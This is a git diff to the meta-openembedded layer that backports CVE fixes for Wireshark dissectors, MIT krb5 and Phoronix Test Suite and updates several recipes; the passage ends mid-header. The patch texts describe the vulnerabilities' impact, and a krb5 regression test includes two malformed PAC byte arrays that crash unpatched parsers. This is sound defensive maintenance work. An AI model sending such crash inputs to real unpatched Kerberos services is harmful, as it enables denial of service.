new file mode 100644 index 0000000000..41b02bb3fa --- /dev/null +++ b/meta-networking/recipes-support/wireshark/files/CVE-2023-2952.patch @@ -0,0 +1,98 @@ +From ce87eac0325581b600b3093fcd75080df14ccfda Mon Sep 17 00:00:00 2001 +From: Gerald Combs <gerald@wireshark.org> +Date: Tue, 23 May 2023 13:52:03 -0700 +Subject: [PATCH] XRA: Fix an infinite loop + +C compilers don't care what size a value was on the wire. Use +naturally-sized ints, including in dissect_message_channel_mb where we +would otherwise overflow and loop infinitely. + +Fixes #19100 + +Upstream-Status: Backport [https://gitlab.com/wireshark/wireshark/-/commit/e18d0e369729b0fff5f76f41cbae67e97c2e52e5] +CVE: CVE-2023-2952 + +Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com> +--- + epan/dissectors/packet-xra.c | 16 ++++++++-------- + 1 file changed, 8 insertions(+), 8 deletions(-) + +diff --git a/epan/dissectors/packet-xra.c b/epan/dissectors/packet-xra.c +index 68a8e72..6c7ab74 100644 +--- a/epan/dissectors/packet-xra.c ++++ b/epan/dissectors/packet-xra.c +@@ -478,7 +478,7 @@ dissect_xra_tlv_cw_info(tvbuff_t * tvb, proto_tree * tree, void* data _U_, guint + it = proto_tree_add_item (tree, hf_xra_tlv_cw_info, tvb, 0, tlv_length, ENC_NA); + xra_tlv_cw_info_tree = proto_item_add_subtree (it, ett_xra_tlv_cw_info); + +- guint32 tlv_index =0; ++ unsigned tlv_index = 0; + while (tlv_index < tlv_length) { + guint8 type = tvb_get_guint8 (tvb, tlv_index); + ++tlv_index; +@@ -533,7 +533,7 @@ dissect_xra_tlv_ms_info(tvbuff_t * tvb, proto_tree * tree, void* data _U_, guint + it = proto_tree_add_item (tree, hf_xra_tlv_ms_info, tvb, 0, tlv_length, ENC_NA); + xra_tlv_ms_info_tree = proto_item_add_subtree (it, ett_xra_tlv_ms_info); + +- guint32 tlv_index =0; ++ unsigned tlv_index = 0; + while (tlv_index < tlv_length) { + guint8 type = tvb_get_guint8 (tvb, tlv_index); + ++tlv_index; +@@ -567,7 +567,7 @@ dissect_xra_tlv_burst_info(tvbuff_t * tvb, proto_tree * tree, void* data _U_, gu + it = proto_tree_add_item (tree, hf_xra_tlv_burst_info, tvb, 0, tlv_length, ENC_NA); + xra_tlv_burst_info_tree = proto_item_add_subtree (it, ett_xra_tlv_burst_info); + +- guint32 tlv_index =0; ++ unsigned tlv_index = 0; + while (tlv_index < tlv_length) { + guint8 type = tvb_get_guint8 (tvb, tlv_index); + ++tlv_index; +@@ -607,7 +607,7 @@ dissect_xra_tlv(tvbuff_t * tvb, packet_info * pinfo, proto_tree * tree, void* da + it = proto_tree_add_item (tree, hf_xra_tlv, tvb, 0, tlv_length, ENC_NA); + xra_tlv_tree = proto_item_add_subtree (it, ett_xra_tlv); + +- guint32 tlv_index =0; ++ unsigned tlv_index = 0; + tvbuff_t *xra_tlv_cw_info_tvb, *xra_tlv_ms_info_tvb, *xra_tlv_burst_info_tvb; + + while (tlv_index < tlv_length) { +@@ -751,7 +751,7 @@ dissect_message_channel_mb(tvbuff_t * tvb, packet_info * pinfo, proto_tree* tree + if(packet_start_pointer_field_present) { + proto_tree_add_item_ret_uint (tree, hf_plc_mb_mc_psp, tvb, 1, 2, FALSE, &packet_start_pointer); + +- guint16 docsis_start = 3 + packet_start_pointer; ++ unsigned docsis_start = 3 + packet_start_pointer; + while (docsis_start + 6 < remaining_length) { + /*DOCSIS header in packet*/ + guint8 fc = tvb_get_guint8(tvb,docsis_start + 0); +@@ -760,7 +760,7 @@ dissect_message_channel_mb(tvbuff_t * tvb, packet_info * pinfo, proto_tree* tree + docsis_start += 1; + continue; + } +- guint16 docsis_length = 256*tvb_get_guint8(tvb,docsis_start + 2) + tvb_get_guint8(tvb,docsis_start + 3); ++ unsigned docsis_length = 256*tvb_get_guint8(tvb,docsis_start + 2) + tvb_get_guint8(tvb,docsis_start + 3); + if (docsis_start + 6 + docsis_length <= remaining_length) { + /*DOCSIS packet included in packet*/ + tvbuff_t *docsis_tvb; +@@ -830,7 +830,7 @@ dissect_ncp_message_block(tvbuff_t * tvb, proto_tree * tree) { + static int + dissect_plc(tvbuff_t * tvb, packet_info * pinfo, proto_tree * tree, void* data _U_) { + +- guint16 offset = 0; ++ int offset = 0; + proto_tree *plc_tree; + proto_item *plc_item; + tvbuff_t *mb_tvb; +@@ -890,7 +890,7 @@ dissect_plc(tvbuff_t * tvb, packet_info * pinfo, proto_tree * tree, void* data _ + + static int + dissect_ncp(tvbuff_t * tvb, proto_tree * tree, void* data _U_) { +- guint16 offset = 0; ++ int offset = 0; + proto_tree *ncp_tree; + proto_item *ncp_item; + tvbuff_t *ncp_mb_tvb; +-- +2.25.1 + diff --git a/meta-networking/recipes-support/wireshark/files/CVE-2023-4511.patch b/meta-networking/recipes-support/wireshark/files/CVE-2023-4511.patch new file mode 100644 index 0000000000..6a2f20163c --- /dev/null +++ b/meta-networking/recipes-support/wireshark/files/CVE-2023-4511.patch @@ -0,0 +1,81 @@ +From ef9c79ae81b00a63aa8638076ec81dc9482972e9 Mon Sep 17 00:00:00 2001 +From: John Thacker <johnthacker@gmail.com> +Date: Thu, 10 Aug 2023 05:29:09 -0400 +Subject: [PATCH] btsdp: Keep offset advancing + +hf_data_element_value is a FT_NONE, so we can add the item with +the expected length and get_hfi_length() will adjust the length +without throwing an exception. There's no need to add it with +zero length and call proto_item_set_len. Also, don't increment +the offset by 0 instead of the real length when there isn't +enough data in the packet, as that can lead to failing to advance +the offset. + +When dissecting a sequence type (sequence or alternative) and +recursing into the sequence member, instead of using the main +packet tvb directly, create a subset using the indicated length +of the sequence. That will properly throw an exception if a +contained item is larger than the containing sequence, instead of +dissecting the same bytes as several different items (inside +the sequence recursively, as well in the outer loop.) + +Fix #19258 + +Upstream-Status: Backport [https://gitlab.com/wireshark/wireshark/-/commit/ef9c79ae81b00a63aa8638076ec81dc9482972e9] +CVE: CVE-2023-4511 +Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> +--- + epan/dissectors/packet-btsdp.c | 15 ++++++++------- + 1 file changed, 8 insertions(+), 7 deletions(-) + +diff --git a/epan/dissectors/packet-btsdp.c b/epan/dissectors/packet-btsdp.c +index 397ece7..eb7f5fa 100644 +--- a/epan/dissectors/packet-btsdp.c ++++ b/epan/dissectors/packet-btsdp.c +@@ -1925,13 +1925,11 @@ dissect_data_element(proto_tree *tree, proto_tree **next_tree, + offset += len - length; + } + +- pitem = proto_tree_add_item(ptree, hf_data_element_value, tvb, offset, 0, ENC_NA); ++ pitem = proto_tree_add_item(ptree, hf_data_element_value, tvb, offset, length, ENC_NA); + if (length > tvb_reported_length_remaining(tvb, offset)) { + expert_add_info(pinfo, pitem, &ei_data_element_value_large); +- length = 0; +- } +- proto_item_set_len(pitem, length); +- if (length == 0) ++ proto_item_append_text(pitem, ": MISSING"); ++ } else if (length == 0) + proto_item_append_text(pitem, ": MISSING"); + + if (next_tree) *next_tree = proto_item_add_subtree(pitem, ett_btsdp_data_element_value); +@@ -3523,6 +3521,8 @@ dissect_sdp_type(proto_tree *tree, packet_info *pinfo, tvbuff_t *tvb, + gint bytes_to_go = size; + gint first = 1; + wmem_strbuf_t *substr; ++ tvbuff_t *next_tvb = tvb_new_subset_length(tvb, offset, size); ++ gint next_offset = 0; + + ti = proto_tree_add_item(next_tree, (type == 6) ? hf_data_element_value_sequence : hf_data_element_value_alternative, + tvb, offset, size, ENC_NA); +@@ -3537,14 +3537,15 @@ dissect_sdp_type(proto_tree *tree, packet_info *pinfo, tvbuff_t *tvb, + first = 0; + } + +- size = dissect_sdp_type(st, pinfo, tvb, offset, attribute, service_uuid, ++ size = dissect_sdp_type(st, pinfo, next_tvb, next_offset, ++ attribute, service_uuid, + service_did_vendor_id, service_did_vendor_id_source, + service_hdp_data_exchange_specification, service_info, &substr); + if (size < 1) { + break; + } + wmem_strbuf_append_printf(info_buf, "%s ", wmem_strbuf_get_str(substr)); +- offset += size ; ++ next_offset += size; + bytes_to_go -= size; + } + +-- +2.25.1 + diff --git a/meta-networking/recipes-support/wireshark/files/CVE-2024-0208.patch b/meta-networking/recipes-support/wireshark/files/CVE-2024-0208.patch new file mode 100644 index 0000000000..4c9f8d29c0 --- /dev/null +++ b/meta-networking/recipes-support/wireshark/files/CVE-2024-0208.patch @@ -0,0 +1,42 @@ +From a8586fde3a6512466afb2a660538ef3fe712076b Mon Sep 17 00:00:00 2001 +From: John Thacker <johnthacker@gmail.com> +Date: Thu, 23 Nov 2023 13:47:51 -0500 +Subject: [PATCH] gvcp: Don't try to add a NULL string to a column + +This was caught as an invalid argument by g_strlcpy before 4.2, +but it was never a good idea. + +Fix #19496 + +Upstream-Status: Backport [https://gitlab.com/wireshark/wireshark/-/commit/a8586fde3a6512466afb2a660538ef3fe712076b] +CVE: CVE-2024-0208 +Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com> +--- + epan/dissectors/packet-gvcp.c | 7 ++----- + 1 file changed, 2 insertions(+), 5 deletions(-) + +diff --git a/epan/dissectors/packet-gvcp.c b/epan/dissectors/packet-gvcp.c +index 6a17cff..eb849c0 100644 +--- a/epan/dissectors/packet-gvcp.c ++++ b/epan/dissectors/packet-gvcp.c +@@ -2222,15 +2222,12 @@ static void dissect_readreg_ack(proto_tree *gvcp_telegram_tree, tvbuff_t *tvb, p + if (addr_list_size > 0) + { + address_string = get_register_name_from_address(*((guint32*)wmem_array_index(gvcp_trans->addr_list, 0)), gvcp_info, &is_custom_register); ++ col_append_str(pinfo->cinfo, COL_INFO, address_string); + } + + if (num_registers) + { +- col_append_fstr(pinfo->cinfo, COL_INFO, "%s Value=0x%08X", address_string, tvb_get_ntohl(tvb, offset)); +- } +- else +- { +- col_append_str(pinfo->cinfo, COL_INFO, address_string); ++ col_append_sep_fstr(pinfo->cinfo, COL_INFO, " ", "Value=0x%08X", tvb_get_ntohl(tvb, offset)); + } + } + } +-- +2.25.1 + diff --git a/meta-networking/recipes-support/wireshark/wireshark_3.4.12.bb b/meta-networking/recipes-support/wireshark/wireshark_3.4.12.bb index 1a4aedc139..41c363ad30 100644 --- a/meta-networking/recipes-support/wireshark/wireshark_3.4.12.bb +++ b/meta-networking/recipes-support/wireshark/wireshark_3.4.12.bb @@ -16,6 +16,19 @@ SRC_URI += " \ file://0003-bison-Remove-line-directives.patch \ file://0004-lemon-Remove-line-directives.patch \ file://CVE-2022-3190.patch \ + file://CVE-2023-2855.patch \ + file://CVE-2023-2856.patch \ + file://CVE-2023-2858.patch \ + file://CVE-2023-2879.patch \ + file://CVE-2023-2952.patch \ + file://CVE-2023-0666.patch \ + file://CVE-2023-0667.patch \ + file://CVE-2023-0668.patch \ + file://CVE-2023-2906.patch \ + file://CVE-2023-1992.patch \ + file://CVE-2022-4345.patch \ + file://CVE-2024-0208.patch \ + file://CVE-2023-4511.patch \ " UPSTREAM_CHECK_URI = "https://1.as.dl.wireshark.org/src" diff --git a/meta-oe/conf/layer.conf b/meta-oe/conf/layer.conf index 88715d5e82..a0c644a2f4 100644 --- a/meta-oe/conf/layer.conf +++ b/meta-oe/conf/layer.conf @@ -47,6 +47,7 @@ LAYERSERIES_COMPAT_openembedded-layer = "kirkstone" LICENSE_PATH += "${LAYERDIR}/licenses" PREFERRED_RPROVIDER_libdevmapper = "lvm2" +PREFERRED_RPROVIDER_libdevmapper-native = "lvm2-native" PREFERRED_PROVIDER_android-tools-conf ?= "android-tools-conf" SIGGEN_EXCLUDERECIPES_ABISAFE += " \ @@ -105,4 +106,4 @@ SIGGEN_EXCLUDE_SAFE_RECIPE_DEPS += " \ DEFAULT_TEST_SUITES:pn-meta-oe-ptest-image = " ${PTESTTESTSUITE}" -NON_MULTILIB_RECIPES:append = " crash" +NON_MULTILIB_RECIPES:append = " crash pahole" diff --git a/meta-oe/dynamic-layers/meta-python/recipes-bsp/rwmem/rwmem_1.2.bb b/meta-oe/dynamic-layers/meta-python/recipes-bsp/rwmem/rwmem_1.2.bb index 7bca24cc0a..b59fc1bc95 100644 --- a/meta-oe/dynamic-layers/meta-python/recipes-bsp/rwmem/rwmem_1.2.bb +++ b/meta-oe/dynamic-layers/meta-python/recipes-bsp/rwmem/rwmem_1.2.bb @@ -22,7 +22,7 @@ SRCREV_FORMAT = "rwmem_inih" SRC_URI = " \ git://github.com/tomba/rwmem.git;protocol=https;name=rwmem;branch=master \ - git://github.com/benhoyt/inih.git;protocol=https;name=inih;nobranch=1;destsuffix=git/ext/inih \ + git://github.com/benhoyt/inih.git;protocol=https;name=inih;branch=master;destsuffix=git/ext/inih \ " S = "${WORKDIR}/git" diff --git a/meta-oe/dynamic-layers/meta-python/recipes-connectivity/lirc/lirc_0.10.1.bb b/meta-oe/dynamic-layers/meta-python/recipes-connectivity/lirc/lirc_0.10.1.bb index fe9685924b..226543bbd8 100644 --- a/meta-oe/dynamic-layers/meta-python/recipes-connectivity/lirc/lirc_0.10.1.bb +++ b/meta-oe/dynamic-layers/meta-python/recipes-connectivity/lirc/lirc_0.10.1.bb @@ -49,9 +49,9 @@ do_configure:append() { # Create PYTHON_TARBALL which LIRC needs for install-nodist_pkgdataDATA do_install:prepend() { - rm -rf ${WORKDIR}/${PN}-${PV}/python-pkg/dist/ - mkdir ${WORKDIR}/${PN}-${PV}/python-pkg/dist/ - tar --exclude='${WORKDIR}/${PN}-${PV}/python-pkg/*' -czf ${WORKDIR}/${PN}-${PV}/python-pkg/dist/${PN}-${PV}.tar.gz ${S} + rm -rf ${S}/python-pkg/dist/ + mkdir ${S}/python-pkg/dist/ + tar --exclude='${S}/python-pkg/*' -czf ${S}/python-pkg/dist/${BP}.tar.gz ${S} } # In code, path to python is a variable that is replaced with path to native version of it diff --git a/meta-oe/dynamic-layers/meta-python/recipes-core/packagegroups/packagegroup-meta-oe.bbappend b/meta-oe/dynamic-layers/meta-python/recipes-core/packagegroups/packagegroup-meta-oe.bbappend index 09f3e34f4c..e1db8bac9e 100644 --- a/meta-oe/dynamic-layers/meta-python/recipes-core/packagegroups/packagegroup-meta-oe.bbappend +++ b/meta-oe/dynamic-layers/meta-python/recipes-core/packagegroups/packagegroup-meta-oe.bbappend @@ -11,7 +11,7 @@ RDEPENDS:packagegroup-meta-oe-connectivity += "\ RDEPENDS:packagegroup-meta-oe-extended += "\ lcdproc \ - mozjs \ + mozjs-91 \ " RDEPENDS:packagegroup-meta-oe-support += "\ smem \ diff --git a/meta-oe/dynamic-layers/meta-python/recipes-dbs/mongodb/mongodb_git.bb b/meta-oe/dynamic-layers/meta-python/recipes-dbs/mongodb/mongodb_git.bb index ff4a16e9f2..0969fb6ce2 100644 --- a/meta-oe/dynamic-layers/meta-python/recipes-dbs/mongodb/mongodb_git.bb +++ b/meta-oe/dynamic-layers/meta-python/recipes-dbs/mongodb/mongodb_git.bb @@ -117,7 +117,7 @@ scons_do_install() { # install mongo data folder install -m 755 -d ${D}${localstatedir}/lib/${BPN} - chown ${PN}:${PN} ${D}${localstatedir}/lib/${BPN} + chown ${BPN}:${BPN} ${D}${localstatedir}/lib/${BPN} # Create /var/log/mongodb in runtime. if [ "${@bb.utils.filter('DISTRO_FEATURES', 'systemd', d)}" ]; then diff --git a/meta-oe/recipes-benchmark/glmark2/glmark2_git.bb b/meta-oe/recipes-benchmark/glmark2/glmark2_git.bb index 188d4e5bdf..68c42b329a 100644 --- a/meta-oe/recipes-benchmark/glmark2/glmark2_git.bb +++ b/meta-oe/recipes-benchmark/glmark2/glmark2_git.bb @@ -24,7 +24,7 @@ SRCREV = "0858b450cd88c84a15b99dda9698d44e7f7e8c70" S = "${WORKDIR}/git" -inherit waf pkgconfig features_check +inherit waf pkgconfig features_check python3native ANY_OF_DISTRO_FEATURES = "opengl dispmanx" diff --git a/meta-oe/recipes-benchmark/iperf3/iperf3_3.11.bb b/meta-oe/recipes-benchmark/iperf3/iperf3_3.14.bb index 2142a8ef1d..d181eb3b02 100644 --- a/meta-oe/recipes-benchmark/iperf3/iperf3_3.11.bb +++ b/meta-oe/recipes-benchmark/iperf3/iperf3_3.14.bb @@ -11,14 +11,14 @@ BUGTRACKER = "https://github.com/esnet/iperf/issues" AUTHOR = "ESNET <info@es.net>, Lawrence Berkeley National Laboratory <websupport@lbl.gov>" LICENSE = "BSD-3-Clause" -LIC_FILES_CHKSUM = "file://LICENSE;md5=68ae8cfc577a2c8c51bb51e9628e80b7" +LIC_FILES_CHKSUM = "file://LICENSE;md5=dc6301c8256ceb8f71c9e3c2ae9096b9" SRC_URI = "git://github.com/esnet/iperf.git;branch=master;protocol=https \ file://0002-Remove-pg-from-profile_CFLAGS.patch \ file://0001-configure.ac-check-for-CPP-prog.patch \ " -SRCREV = "76bd67f6e90e239a7686202d2b1b595159826d24" +SRCREV = "a0be85934144bc04712a6695b14ea6e45c379e1d" S = "${WORKDIR}/git" diff --git a/meta-oe/recipes-benchmark/phoronix-test-suite/files/CVE-2022-40704.patch b/meta-oe/recipes-benchmark/phoronix-test-suite/files/CVE-2022-40704.patch new file mode 100644 index 0000000000..8b6405b4ad --- /dev/null +++ b/meta-oe/recipes-benchmark/phoronix-test-suite/files/CVE-2022-40704.patch @@ -0,0 +1,46 @@ +From d3880d9d3ba795138444da83f1153c3c3ac27640 Mon Sep 17 00:00:00 2001 +From: Michael Larabel <michael@phoronix.com> +Date: Sat, 23 Jul 2022 07:32:43 -0500 +Subject: [PATCH] phoromatic: Explicitly check both $_GET abd $_POST in + phoromatic_quit_if_invalid_input_found() + +Fixes: https://github.com/phoronix-test-suite/phoronix-test-suite/issues/650#issuecomment-1193116678 + +Upstream-Status: Backport +CVE: CVE-2022-40704 + +Reference to upstream patch: +https://github.com/phoronix-test-suite/phoronix-test-suite/commit/d3880d9d3ba795138444da83f1153c3c3ac27640 + +Signed-off-by: Li Wang <li.wang@windriver.com> +--- + pts-core/phoromatic/phoromatic_functions.php | 15 +++++++++++++-- + 1 file changed, 13 insertions(+), 2 deletions(-) + +diff --git a/pts-core/phoromatic/phoromatic_functions.php b/pts-core/phoromatic/phoromatic_functions.php +index 74ccc5444c..c2313dcdea 100644 +--- a/pts-core/phoromatic/phoromatic_functions.php ++++ b/pts-core/phoromatic/phoromatic_functions.php +@@ -37,9 +37,20 @@ function phoromatic_quit_if_invalid_input_found($input_keys = null) + { + foreach($input_keys as $key) + { +- if(isset($_REQUEST[$key]) && !empty($_REQUEST[$key])) ++ if(isset($_GET[$key]) && !empty($_GET[$key])) + { +- foreach(pts_arrays::to_array($_REQUEST[$key]) as $val_to_check) ++ foreach(pts_arrays::to_array($_GET[$key]) as $val_to_check) ++ { ++ if(stripos($val_to_check, $invalid_string) !== false) ++ { ++ echo '<strong>Exited due to invalid input ( ' . $invalid_string . ') attempted:</strong> ' . htmlspecialchars($val_to_check); ++ exit; ++ } ++ } ++ } ++ if(isset($_POST[$key]) && !empty($_POST[$key])) ++ { ++ foreach(pts_arrays::to_array($_POST[$key]) as $val_to_check) + { + if(stripos($val_to_check, $invalid_string) !== false) + { diff --git a/meta-oe/recipes-benchmark/phoronix-test-suite/phoronix-test-suite_10.8.2.bb b/meta-oe/recipes-benchmark/phoronix-test-suite/phoronix-test-suite_10.8.2.bb index 825f7024e7..44f2249bc9 100644 --- a/meta-oe/recipes-benchmark/phoronix-test-suite/phoronix-test-suite_10.8.2.bb +++ b/meta-oe/recipes-benchmark/phoronix-test-suite/phoronix-test-suite_10.8.2.bb @@ -5,7 +5,11 @@ LICENSE = "GPL-3.0-only" LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504" SECTION = "console/tests" -SRC_URI = "http://www.phoronix-test-suite.com/releases/${BP}.tar.gz" +SRC_URI = "http://www.phoronix-test-suite.com/releases/${BP}.tar.gz \ + file://CVE-2022-40704.patch \ + " + + SRC_URI[md5sum] = "459c3c45b39bb3d720ddc8ba5f944332" SRC_URI[sha256sum] = "86681343d20415831ab16ef6c3d1c317e2345e771925e0698ae920a03a9eaab6" diff --git a/meta-oe/recipes-bsp/lm_sensors/lmsensors_3.6.0.bb b/meta-oe/recipes-bsp/lm_sensors/lmsensors_3.6.0.bb index f821cdaf4a..aba5ab5878 100644 --- a/meta-oe/recipes-bsp/lm_sensors/lmsensors_3.6.0.bb +++ b/meta-oe/recipes-bsp/lm_sensors/lmsensors_3.6.0.bb @@ -151,12 +151,13 @@ RRECOMMENDS:${PN}-fancontrol = "lmsensors-config-fancontrol" # sensors-detect script files FILES:${PN}-sensorsdetect = "${sbindir}/sensors-detect" FILES:${PN}-sensorsdetect-doc = "${mandir}/man8/sensors-detect.8" -RDEPENDS:${PN}-sensorsdetect = "${PN}-sensors perl perl-modules" +RDEPENDS:${PN}-sensorsdetect = "${PN}-sensors perl perl-module-fcntl perl-module-file-basename \ + perl-module-strict perl-module-constant" # sensors-conf-convert script files FILES:${PN}-sensorsconfconvert = "${bindir}/sensors-conf-convert" FILES:${PN}-sensorsconfconvert-doc = "${mandir}/man8/sensors-conf-convert.8" -RDEPENDS:${PN}-sensorsconfconvert = "${PN}-sensors perl perl-modules" +RDEPENDS:${PN}-sensorsconfconvert = "${PN}-sensors perl perl-module-strict perl-module-vars" # pwmconfig script files FILES:${PN}-pwmconfig = "${sbindir}/pwmconfig" diff --git a/meta-oe/recipes-bsp/pointercal/pointercal_0.0.bb b/meta-oe/recipes-bsp/pointercal/pointercal_0.0.bb index d3e7973329..9b72ffefe4 100644 --- a/meta-oe/recipes-bsp/pointercal/pointercal_0.0.bb +++ b/meta-oe/recipes-bsp/pointercal/pointercal_0.0.bb @@ -20,3 +20,5 @@ do_install() { ALLOW_EMPTY:${PN} = "1" PACKAGE_ARCH = "${MACHINE_ARCH}" INHIBIT_DEFAULT_DEPS = "1" + +BBCLASSEXTEND = "native nativesdk" diff --git a/meta-oe/recipes-connectivity/krb5/krb5/CVE-2022-42898.patch b/meta-oe/recipes-connectivity/krb5/krb5/CVE-2022-42898.patch new file mode 100644 index 0000000000..6d04bf8980 --- /dev/null +++ b/meta-oe/recipes-connectivity/krb5/krb5/CVE-2022-42898.patch @@ -0,0 +1,110 @@ +From 4e661f0085ec5f969c76c0896a34322c6c432de4 Mon Sep 17 00:00:00 2001 +From: Greg Hudson <ghudson@mit.edu> +Date: Mon, 17 Oct 2022 20:25:11 -0400 +Subject: [PATCH] Fix integer overflows in PAC parsing + +In krb5_parse_pac(), check for buffer counts large enough to threaten +integer overflow in the header length and memory length calculations. +Avoid potential integer overflows when checking the length of each +buffer. Credit to OSS-Fuzz for discovering one of the issues. + +CVE-2022-42898: + +In MIT krb5 releases 1.8 and later, an authenticated attacker may be +able to cause a KDC or kadmind process to crash by reading beyond the +bounds of allocated memory, creating a denial of service. A +privileged attacker may similarly be able to cause a Kerberos or GSS +application service to crash. On 32-bit platforms, an attacker can +also cause insufficient memory to be allocated for the result, +potentially leading to remote code execution in a KDC, kadmind, or GSS +or Kerberos application server process. An attacker with the +privileges of a cross-realm KDC may be able to extract secrets from a +KDC process's memory by having them copied into the PAC of a new +ticket. + +(cherry picked from commit ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583) + +ticket: 9074 +version_fixed: 1.19.4 + +Upstream-Status: Backport [https://github.com/krb5/krb5/commit/4e661f0085ec5f969c76c0896a34322c6c432de4] +CVE: CVE-2022-42898 +Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com> +--- + src/lib/krb5/krb/pac.c | 9 +++++++-- + src/lib/krb5/krb/t_pac.c | 18 ++++++++++++++++++ + 2 files changed, 25 insertions(+), 2 deletions(-) + +diff --git a/src/lib/krb5/krb/pac.c b/src/lib/krb5/krb/pac.c +index cc74f37..70428a1 100644 +--- a/src/lib/krb5/krb/pac.c ++++ b/src/lib/krb5/krb/pac.c +@@ -27,6 +27,8 @@ + #include "k5-int.h" + #include "authdata.h" + ++#define MAX_BUFFERS 4096 ++ + /* draft-brezak-win2k-krb-authz-00 */ + + /* +@@ -316,6 +318,9 @@ krb5_pac_parse(krb5_context context, + if (version != 0) + return EINVAL; + ++ if (cbuffers < 1 || cbuffers > MAX_BUFFERS) ++ return ERANGE; ++ + header_len = PACTYPE_LENGTH + (cbuffers * PAC_INFO_BUFFER_LENGTH); + if (len < header_len) + return ERANGE; +@@ -348,8 +353,8 @@ krb5_pac_parse(krb5_context context, + krb5_pac_free(context, pac); + return EINVAL; + } +- if (buffer->Offset < header_len || +- buffer->Offset + buffer->cbBufferSize > len) { ++ if (buffer->Offset < header_len || buffer->Offset > len || ++ buffer->cbBufferSize > len - buffer->Offset) { + krb5_pac_free(context, pac); + return ERANGE; + } +diff --git a/src/lib/krb5/krb/t_pac.c b/src/lib/krb5/krb/t_pac.c +index 7b756a2..2353e9f 100644 +--- a/src/lib/krb5/krb/t_pac.c ++++ b/src/lib/krb5/krb/t_pac.c +@@ -431,6 +431,16 @@ static const unsigned char s4u_pac_ent_xrealm[] = { + 0x8a, 0x81, 0x9c, 0x9c, 0x00, 0x00, 0x00, 0x00 + }; + ++static const unsigned char fuzz1[] = { ++ 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, ++ 0x06, 0xff, 0xff, 0xff, 0x00, 0x00, 0xf5 ++}; ++ ++static const unsigned char fuzz2[] = { ++ 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, ++ 0x20, 0x20 ++}; ++ + static const char *s4u_principal = "w2k8u@ACME.COM"; + static const char *s4u_enterprise = "w2k8u@abc@ACME.COM"; + +@@ -646,6 +656,14 @@ main(int argc, char **argv) + krb5_free_principal(context, sep); + } + ++ /* Check problematic PACs found by fuzzing. */ ++ ret = krb5_pac_parse(context, fuzz1, sizeof(fuzz1), &pac); ++ if (!ret) ++ err(context, ret, "krb5_pac_parse should have failed"); ++ ret = krb5_pac_parse(context, fuzz2, sizeof(fuzz2), &pac); ++ if (!ret) ++ err(context, ret, "krb5_pac_parse should have failed"); ++ + /* + * Test empty free + */ +-- +2.25.1 + diff --git a/meta-oe/recipes-connectivity/krb5/krb5/CVE-2023-36054.patch b/meta-oe/recipes-connectivity/krb5/krb5/CVE-2023-36054.patch new file mode 100644 index 0000000000..160c090bce --- /dev/null +++ b/meta-oe/recipes-connectivity/krb5/krb5/CVE-2023-36054.patch @@ -0,0 +1,68 @@ +From ef08b09c9459551aabbe7924fb176f1583053cdd Mon Sep 17 00:00:00 2001 +From: Greg Hudson <ghudson@mit.edu> +Date: Mon, 21 Aug 2023 03:08:15 +0000 +Subject: [PATCH] Ensure array count consistency in kadm5 RPC + +In _xdr_kadm5_principal_ent_rec(), ensure that n_key_data matches the +key_data array count when decoding. Otherwise when the structure is +later freed, xdr_array() could iterate over the wrong number of +elements, either leaking some memory or freeing uninitialized +pointers. Reported by Robert Morris. + +CVE: CVE-2023-36054 + +An authenticated attacker can cause a kadmind process to crash by +freeing uninitialized pointers. Remote code execution is unlikely. +An attacker with control of a kadmin server can cause a kadmin client +to crash by freeing uninitialized pointers. + +ticket: 9099 (new) +tags: pullup +target_version: 1.21-next +target_version: 1.20-next + +Upstream-Status: Backport [https://github.com/krb5/krb5/commit/ef08b09c9459551aabbe7924fb176f1583053cdd] + +Signed-off-by: Soumya Sambu <soumya.sambu@windriver.com> +--- + src/lib/kadm5/kadm_rpc_xdr.c | 11 ++++++++--- + 1 file changed, 8 insertions(+), 3 deletions(-) + +diff --git a/src/lib/kadm5/kadm_rpc_xdr.c b/src/lib/kadm5/kadm_rpc_xdr.c +index 2892d41..94b1ce8 100644 +--- a/src/lib/kadm5/kadm_rpc_xdr.c ++++ b/src/lib/kadm5/kadm_rpc_xdr.c +@@ -390,6 +390,7 @@ _xdr_kadm5_principal_ent_rec(XDR *xdrs, kadm5_principal_ent_rec *objp, + int v) + { + unsigned int n; ++ bool_t r; + + if (!xdr_krb5_principal(xdrs, &objp->principal)) { + return (FALSE); +@@ -443,6 +444,9 @@ _xdr_kadm5_principal_ent_rec(XDR *xdrs, kadm5_principal_ent_rec *objp, + if (!xdr_krb5_int16(xdrs, &objp->n_key_data)) { + return (FALSE); + } ++ if (xdrs->x_op == XDR_DECODE && objp->n_key_data < 0) { ++ return (FALSE); ++ } + if (!xdr_krb5_int16(xdrs, &objp->n_tl_data)) { + return (FALSE); + } +@@ -451,9 +455,10 @@ _xdr_kadm5_principal_ent_rec(XDR *xdrs, kadm5_principal_ent_rec *objp, + return FALSE; + } + n = objp->n_key_data; +- if (!xdr_array(xdrs, (caddr_t *) &objp->key_data, +- &n, ~0, sizeof(krb5_key_data), +- xdr_krb5_key_data_nocontents)) { ++ r = xdr_array(xdrs, (caddr_t *) &objp->key_data, &n, objp->n_key_data, ++ sizeof(krb5_key_data), xdr_krb5_key_data_nocontents); ++ objp->n_key_data = n; ++ if (!r) { + return (FALSE); + } + +-- +2.40.0 diff --git a/meta-oe/recipes-connectivity/krb5/krb5_1.17.2.bb b/meta-oe/recipes-connectivity/krb5/krb5_1.17.2.bb index 6e0b2fdacb..a92066171b 100644 --- a/meta-oe/recipes-connectivity/krb5/krb5_1.17.2.bb +++ b/meta-oe/recipes-connectivity/krb5/krb5_1.17.2.bb @@ -32,6 +32,8 @@ SRC_URI = "http://web.mit.edu/kerberos/dist/${BPN}/${SHRT_VER}/${BP}.tar.gz \ file://krb5-admin-server.service \ file://CVE-2021-36222.patch;striplevel=2 \ file://CVE-2021-37750.patch;striplevel=2 \ + file://CVE-2022-42898.patch;striplevel=2 \ + file://CVE-2023-36054.patch;striplevel=2 \ " SRC_URI[md5sum] = "aa4337fffa3b61f22dbd0167f708818f" SRC_URI[sha256sum] = "1a4bba94df92f6d39a197a10687653e8bfbc9a2076e129f6eb92766974f86134" diff --git a/meta-oe/recipes-connectivity/libwebsockets/libwebsockets_4.2.2.bb 